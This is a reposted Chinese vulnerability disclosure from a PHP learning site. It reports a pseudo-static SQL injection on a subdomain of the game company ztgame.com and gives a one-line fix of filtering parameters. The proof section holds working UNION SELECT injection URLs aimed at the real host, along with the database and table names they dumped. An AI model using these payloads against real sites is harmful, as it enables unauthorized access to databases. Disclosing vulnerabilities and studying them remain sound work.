网站地图    收藏   

主页 > 后端 > 网站安全 >

巨人某分站存在伪静态注入及修复 - 网站安全

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 所有数据库漏洞证明:http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.sch......

所有数据库

 
 

漏洞证明:http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(schema_name),9,10,11,@@version,13 from information_schema.schemata
当前数据库存在的表
http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 UNION SELECT 1,2,3,4,database(),6,7,group_concat(table_name),9,10,11,@@version,13 from information_schema.tables where table_schema=database()

think_album,
think_album_qun,
think_app,
think_attach,
think_blog,
think_boss,
think_chat,
think_code,
think_comment,
think_doing,
think_email,
think_file_group,
think_game,
think_gift,
think_gift_category,
think_gong,
think_gong_ding,
think_group,
think_group_member,
think_hello,
think_image,
think_jiazu,
think_koc,
think_love,
think_magic,
think_material,
think_m
修复方案:对提交的参数进行相关过滤

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论